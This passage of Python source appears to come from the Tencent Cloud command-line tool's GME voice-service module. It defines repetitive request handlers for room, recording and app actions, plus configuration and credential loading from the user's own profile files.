(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteRoomMember(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
elif os.getenv(OptionsDefine.ENV_TKE_REGION) and os.getenv(OptionsDefine.ENV_TKE_PROVIDER_ID) and os.getenv(OptionsDefine.ENV_TKE_WEB_IDENTITY_TOKEN_FILE) and os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN):
cred = credential.DefaultTkeOIDCRoleArnProvider().get_credentials()
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
if g_param[OptionsDefine.Language]:
profile.language = g_param[OptionsDefine.Language]
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.GmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteRoomMemberRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DeleteRoomMember(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeApplicationData(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
elif os.getenv(OptionsDefine.ENV_TKE_REGION) and os.getenv(OptionsDefine.ENV_TKE_PROVIDER_ID) and os.getenv(OptionsDefine.ENV_TKE_WEB_IDENTITY_TOKEN_FILE) and os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN):
cred = credential.DefaultTkeOIDCRoleArnProvider().get_credentials()
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
if g_param[OptionsDefine.Language]:
profile.language = g_param[OptionsDefine.Language]
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.GmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeApplicationDataRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeApplicationData(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeRecordInfo(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
elif os.getenv(OptionsDefine.ENV_TKE_REGION) and os.getenv(OptionsDefine.ENV_TKE_PROVIDER_ID) and os.getenv(OptionsDefine.ENV_TKE_WEB_IDENTITY_TOKEN_FILE) and os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN):
cred = credential.DefaultTkeOIDCRoleArnProvider().get_credentials()
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
if g_param[OptionsDefine.Language]:
profile.language = g_param[OptionsDefine.Language]
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.GmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeRecordInfoRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeRecordInfo(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doStartRecord(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
elif os.getenv(OptionsDefine.ENV_TKE_REGION) and os.getenv(OptionsDefine.ENV_TKE_PROVIDER_ID) and os.getenv(OptionsDefine.ENV_TKE_WEB_IDENTITY_TOKEN_FILE) and os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN):
cred = credential.DefaultTkeOIDCRoleArnProvider().get_credentials()
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
if g_param[OptionsDefine.Language]:
profile.language = g_param[OptionsDefine.Language]
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.GmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.StartRecordRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.StartRecord(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateApp(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
elif os.getenv(OptionsDefine.ENV_TKE_REGION) and os.getenv(OptionsDefine.ENV_TKE_PROVIDER_ID) and os.getenv(OptionsDefine.ENV_TKE_WEB_IDENTITY_TOKEN_FILE) and os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN):
cred = credential.DefaultTkeOIDCRoleArnProvider().get_credentials()
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
if g_param[OptionsDefine.Language]:
profile.language = g_param[OptionsDefine.Language]
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.GmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateAppRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.CreateApp(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyAppStatus(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
elif os.getenv(OptionsDefine.ENV_TKE_REGION) and os.getenv(OptionsDefine.ENV_TKE_PROVIDER_ID) and os.getenv(OptionsDefine.ENV_TKE_WEB_IDENTITY_TOKEN_FILE) and os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN):
cred = credential.DefaultTkeOIDCRoleArnProvider().get_credentials()
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
if g_param[OptionsDefine.Language]:
profile.language = g_param[OptionsDefine.Language]
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.GmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyAppStatusRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.ModifyAppStatus(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTaskInfo(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
elif os.getenv(OptionsDefine.ENV_TKE_REGION) and os.getenv(OptionsDefine.ENV_TKE_PROVIDER_ID) and os.getenv(OptionsDefine.ENV_TKE_WEB_IDENTITY_TOKEN_FILE) and os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN):
cred = credential.DefaultTkeOIDCRoleArnProvider().get_credentials()
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
if g_param[OptionsDefine.Language]:
profile.language = g_param[OptionsDefine.Language]
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.GmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTaskInfoRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeTaskInfo(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doStopRecord(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
elif os.getenv(OptionsDefine.ENV_TKE_REGION) and os.getenv(OptionsDefine.ENV_TKE_PROVIDER_ID) and os.getenv(OptionsDefine.ENV_TKE_WEB_IDENTITY_TOKEN_FILE) and os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN):
cred = credential.DefaultTkeOIDCRoleArnProvider().get_credentials()
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
if g_param[OptionsDefine.Language]:
profile.language = g_param[OptionsDefine.Language]
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.GmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.StopRecordRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.StopRecord(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
CLIENT_MAP = {
"v20180711": gme_client_v20180711,
}
MODELS_MAP = {
"v20180711": models_v20180711,
}
ACTION_MAP = {
"DescribeAppStatistics": doDescribeAppStatistics,
"ModifyRecordInfo": doModifyRecordInfo,
"DeleteRoomMember": doDeleteRoomMember,
"DescribeApplicationData": doDescribeApplicationData,
"DescribeRecordInfo": doDescribeRecordInfo,
"StartRecord": doStartRecord,
"CreateApp": doCreateApp,
"ModifyAppStatus": doModifyAppStatus,
"DescribeTaskInfo": doDescribeTaskInfo,
"StopRecord": doStopRecord,
}
AVAILABLE_VERSION_LIST = [
"v20180711",
]
def action_caller():
return ACTION_MAP
def parse_global_arg(parsed_globals):
g_param = parsed_globals
is_exist_profile = True
if not parsed_globals["profile"]:
is_exist_profile = False
g_param["profile"] = os.environ.get("TCCLI_PROFILE", "default")
configure_path = os.path.join(os.path.expanduser("~"), ".tccli")
is_conf_exist, conf_path = Utils.file_existed(configure_path, g_param["profile"] + ".configure")
is_cred_exist, cred_path = Utils.file_existed(configure_path, g_param["profile"] + ".credential")
conf = {}
cred = {}
if is_conf_exist:
conf = Utils.load_json_msg(conf_path)
if is_cred_exist:
cred = Utils.load_json_msg(cred_path)
if not (isinstance(conf, dict) and isinstance(cred, dict)):
raise ConfigurationError(
"file: %s or %s is not json format"
% (g_param["profile"] + ".configure", g_param["profile"] + ".credential"))
if OptionsDefine.Token not in cred:
cred[OptionsDefine.Token] = None
if not is_exist_profile:
if os.environ.get(OptionsDefine.ENV_SECRET_ID) and os.environ.get(OptionsDefine.ENV_SECRET_KEY):
cred[OptionsDefine.SecretId] = os.environ.get(OptionsDefine.ENV_SECRET_ID)
cred[OptionsDefine.SecretKey] = os.environ.get(OptionsDefine.ENV_SECRET_KEY)
cred[OptionsDefine.Token] = os.environ.get(OptionsDefine.ENV_TOKEN)
if os.environ.get(OptionsDefine.ENV_REGION):
conf[OptionsDefine.SysParam][OptionsDefine.Region] = os.environ.get(OptionsDefine.ENV_REGION)
if os.environ.get(OptionsDefine.ENV_ROLE_ARN) and os.environ.get(OptionsDefine.ENV_ROLE_SESSION_NAME):
cred[OptionsDefine.RoleArn] = os.environ.get(OptionsDefine.ENV_ROLE_ARN)
cred[OptionsDefine.RoleSessionName] = os.environ.get(OptionsDefine.ENV_ROLE_SESSION_NAME)
for param in g_param.keys():
if g_param[param] is None:
if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId, OptionsDefine.Token]:
if param in cred:
g_param[param] = cred[param]
elif not (g_param[OptionsDefine.UseCVMRole.replace('-', '_')]
or os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN)):
raise ConfigurationError("%s is invalid" % param)
elif param in [OptionsDefine.Region, OptionsDefine.Output, OptionsDefine.Language]:
if param in conf[OptionsDefine.SysParam]:
g_param[param] = conf[OptionsDefine.SysParam][param]
elif param != OptionsDefine.Language:
raise ConfigurationError("%s is invalid" % param)
elif param.replace('_', '-') in [OptionsDefine.RoleArn, OptionsDefine.RoleSessionName]:
if param.replace('_', '-') in cred:
g_param[param] = cred[param.replace('_', '-')]
try:
if g_param[OptionsDefine.ServiceVersion]:
g_param[OptionsDefine.Version] = "v" + g_param[OptionsDefine.ServiceVersion].replace('-', '')
else:
version = conf["gme"][OptionsDefine.Version]
g_param[OptionsDefine.Version] = "v" + version.replace('-', '')
if g_param[OptionsDefine.Endpoint] is None:
g_param[OptionsDefine.Endpoint] = conf["gme"][OptionsDefine.Endpoint]
except Exception as err:
raise ConfigurationError("config file:%s error, %s" % (conf_path, str(err)))
if g_param[OptionsDefine.Version] not in AVAILABLE_VERSION_LIST:
raise Exception("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
if g_param[OptionsDefine.Waiter]:
param = eval(g_param[OptionsDefine.Waiter])
if 'expr' not in param:
raise Exception('`expr` in `--waiter` must be defined')
if 'to' not in param:
raise Exception('`to` in `--waiter` must be defined')
if 'timeout' not in param:
if 'waiter' in conf and 'timeout' in conf['waiter']:
param['timeout'] = conf['waiter']['timeout']
else:
param['timeout'] = 180
if 'interval' not in param:
if 'waiter' in conf and 'interval' in conf['waiter']:
param['interval'] = conf['waiter']['interval']
else:
param['interval'] = 5
param['interval'] = min(param['interval'], param['timeout'])
g_param['OptionsDefine.WaiterInfo'] = param
if six.PY2:
for key, value in g_param.items():
if isinstance(value, six.text_type):
g_param[key] = value.encode('utf-8')
return g_param | PypiClean |
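For reference, a hedged sketch of the payload that the `--waiter` option above expects: `parse_global_arg` parses it with `eval`, evaluates `expr` as a JMESPath expression against each response, and keeps polling until the result equals `to` or `timeout` elapses. The expression and target value below are placeholders.

waiter = {
    "expr": "Response.Data.Status",  # placeholder JMESPath path into the response
    "to": "FINISHED",                # polling stops once the expression equals this
    "timeout": 180,                  # seconds before a ClientError is raised (default 180)
    "interval": 5,                   # seconds between retries (default 5, capped at timeout)
}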